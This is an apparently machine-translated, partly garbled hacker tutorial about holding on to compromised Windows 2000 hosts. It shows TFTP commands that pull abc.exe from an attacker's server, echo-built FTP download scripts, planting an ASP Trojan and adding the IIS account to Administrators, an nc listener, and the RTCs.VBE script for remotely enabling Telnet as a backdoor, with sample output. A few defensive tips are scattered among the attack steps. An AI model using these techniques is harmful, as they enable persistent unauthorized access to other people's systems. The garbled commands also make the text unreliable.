Some long-term control measures and prevention measures for non-shared hosts

Some long-term control measures and prevention measures for non-shared hosts

-- Upload and download, breakthrough _ blank "> firewall and backdoor setup

1. file transmission:

The following methods are implemented without sharing enabled on the remote host.

1. Open sharing

Use idq, WebDAV, and other methods to obtain the system permission after an overflow attack on the target. Use net share to view the sharing, and find that none of the Sharing is enabled. There is no way to set the hard drive of the other party to make it inconvenient to upload and download files.

In fact, the simplest way is to open its sharing,

In this way, I can map its disk to implement file transfer.

In fact, it is very simple to prevent such sharing. As long as there is no file or print sharing added to the attributes of the network neighbors, this can be achieved.

2. Use TFTP for file transmission

The Trivial File Transfer protocol.pdf tool is used to transmit real-time files based on udpconnections. It generally uses ttfp.exe of windows and a TFTP server software to form a complete transmission structure.

It is generally used in an overflow shell or telnet shell. Of course, it can also be implemented in SQL Remote Execute. In this way, the transfer mode can be used for uploading and downloading files on the host without sharing.

First, run the local TFTP server software and ensure that it is always enabled until the transfer is complete. Then, run the following command in Shell

C: \ winnt \ system32> TFTP-I 192.168.0.1 get abc.exe upload the file to the shell target

C: \ winnt \ system32> TFTP-I 192.168.0.1 put abc.exe download the file to the local host

Here you can write the path you want to transfer to at the end.

It should be mentioned that if you use a private IP address, you will not be able to transfer files with external networks. Because your proxy gateway will add its IP address to your datagram to replace your internal network address during data encapsulation. Therefore, you cannot find your TFTP server for Mac addressing on an external network.

To avoid this, delete the tftp.exe file directly. In addition, you can use the tool to modify the TFTP port number in the list (to 0 ).

 

3. Use the local FTP service for file transmission

If you get a shell, you cannot directly remotely operate the FTP command line. Therefore, we generally need to write a script to download or upload files from the FTP host.

Run the echo command to write the script and execute it:

C: \ winnt \ system32> echo open 192.168.0.1> ftp. txe

C: \ winnt \ system32> echo User: pass@192.168.0.1> ftp.txt

C: \ winnt \ system32> echo get abc.exe> ftp.txt

C: \ winnt \ system32> echo bye> ftp.txt

C: \ winnt \ system32> FTP-S: ftp.txt

4. Use TFTP to open the target FTP service for File Transfer

Use tftp.exe to upload a step (for example, xftpd.exe, recommended by hackerhell) and execute it under the command line. We can get a remote host with FTP. You can easily transfer files using browsers or other tools.

Ii. Breakthrough _ blank "> Firewall:

_ Blank, in order to truly achieve the purpose of breaking through the _ blank "> firewall.

There are many examples of penetration attacks. I cannot list them one by one. In fact, I have also successfully tested some sites. penetration attacks from port 80 are common, some use overflow attacks, some use pagesProgram.

Breakthrough _ blank "> firewalls start from the inside, but you must first find some ports that can be penetrated. I wrote an article in the previous section.ArticleIs recorded as a penetration attack. I used a vulnerability in ASP page authentication to successfully obtain a Page Management permission and implemented some upload functions, and penetrate the host from port 80 and obtain the highest permissions.

The TFTP method is actually a way to break through the firewall from the inside. Because port 69 is the TFTP service port that can be used by the system by default, therefore, if you submit a TFTP Transfer Application in shell, _ blank "> the firewall will not reject it. In this way, we can transmit some valuable things to the places we want it to exist.

Break through from port 80 _ blank "> firewalls are common and easy to implement, because access to port 80 is generally not forbidden. I have made two breakthroughs in different ways but in the same principle. Using idq overflow, the shell uploads the ASP Trojan to a directory of the WWW Service, and adds the IIS access process account iusr_computername to the Administrator group. Then I restarted its IIS service.

C: \ winnt \ system32> iisreset

Return to the browser and open the ASP Trojan to view the net session. This proves that everything I did has an effect. In this way, I have set up a high permission (administrators) on port 80). Achieve a breakthrough in the firewall.

Haha! Because I have not been able to restart the IIS service, I have to wait ...... The next day I saw that IIS has been restarted, and NC is still there, so I can't stand such an administrator. Faint! Okay. Actually, the webshell has been set up. Enter the following in the local command line:

E: \> nc.exe-l-P 888-VV: Wait for a connection.

Enter the following in the browser:

I will not introduce many Trojan articles. For the script execution permission, I think it will be okay if you configure IIS!

The above are just some ideas about port 80 penetration breakthrough _ blank "> firewall. In fact, there are still many breakthroughs that can be achieved, for example, it is a good example to use port 80 and pcAnywhere to penetrate the animation.

3. Backdoor erection:

In order to gain control over the remote host for a longer period of time, we need to place some backdoor programs, which have been involved in the previous sections. I believe you have some knowledge. But how do you place your backdoor programs when people and sharing are not enabled?

You may think that many Windows Services are based on IPC $, so as long as you close the share, even if you get the admin permission, there will be nothing to do. After all, "a backdoor cannot be placed without sharing ".

However, this is not the case. Now there are many opportunities for the host script program of the WMI Service, which not only solves such problems, but also produces many security risks. As far as I know, there are two VBE scripts that can enable remote host Telnet and terminal services. Here I will only introduce the use of the host script for enabling the telnet service:

 

The RTCs. VBE is a Windows Script used to remotely enable/disable the target Telnet service.
Feature: it does not depend on whether IPC $ is open or not.
Principle: directly access the target Windows Management Specification Service (Wmi), which is an important service of the system and is started by default.
Supported platforms: Windows 2000 Professional, Windows 2000 Server, Windows XP
Usage:
Use the script cscript.exe in the command line to call the script, such

C: \> cscript RTCs. VBE <target IP address> <username> <password> <NTLM authentication method> <Telnet Service port>

The NTLM value can be 0, 1, 2:
0: NTLM authentication is not used;
1: First try NTLM authentication. If the password fails, use the user name and password;
2: Only NTLM authentication is used.
The empty password is represented by two double quotes.

The script automatically checks the target Telnet service. If it is not started, it is started. Otherwise, it is disabled.
Run the same command twice to enable/disable the service once.
When you disable the service, you must enter a total of five parameters. In this way, you can restore the service as needed and set it to the default value (NTLM = 2, port 23)
If the telnet service is disabled, it is automatically changed to "Manual ".

 

C: \> cscript RTCs. VBE 202. ***** TsInternetUser ************** 0 23

Microsoft (r) Windows Script Host version 5.6
Copyright (c) Microsoft Corporation 1996-2001. All rights reserved.

**************************************** ********************************
RTCs v1.08
Remote telnet configure script, by zzzevazzz
Welcome to visite www.isgrey.com
Usage:
Cscript c: \ RTCs. VBE targetip Username Password ntlmauthor telnetport
It will auto change state of target telnet server.
**************************************** ********************************
Conneting 202 .***.***.***....
OK!
Setting NTLM = 0 ....
OK!
Setting Port = 23 ....
OK!
Querying state of telnet server ....
Changeing state ....
OK!
Target telnet server has been start successfully!
Now, you can try: Telnet 202. *** 23, to get a shell.

C: \> Telnet 202 .***.***.***

Microsoft (r) Windows (TM) Version 5.00 (build 2195)
Welcome to Microsoft Telnet Service
Telnet Server build 5.00.99201.1
Login: TsInternetUser
Password :*********

* ===================================================== ======================================
Welcome to the Microsoft Telnet server.
* ===================================================== ======================================
C: \>

 

Successful!

 

Another script is rots. VBE, which is used to enable Terminal Services. I have never succeeded, so it is hard to introduce it to you.

To open a backdoor, you need to use your own skills. For example, the upload and download methods mentioned earlier can be used comprehensively. It depends on your own ...... For example, as mentioned in breakthrough _ blank "> firewall, I think it is also a good way to set up a backdoor.

 

I think the above three aspects are inseparable. It is very difficult for me to separate them ...... That's why I thought this article for so long.

 

Postscript:

Some people said today that writing this article is definitely faulty. It's all shell, and it's so troublesome ...... Some people say that the use of these preventive measures has already come in ......

As a matter of fact, there are still many things to do with the shell. Let's take a look at what the shell can do, and try to avoid the destruction behavior after the intruders get the shell ...... No way, the first line of defense has collapsed, so I have to leave a hand to remedy it.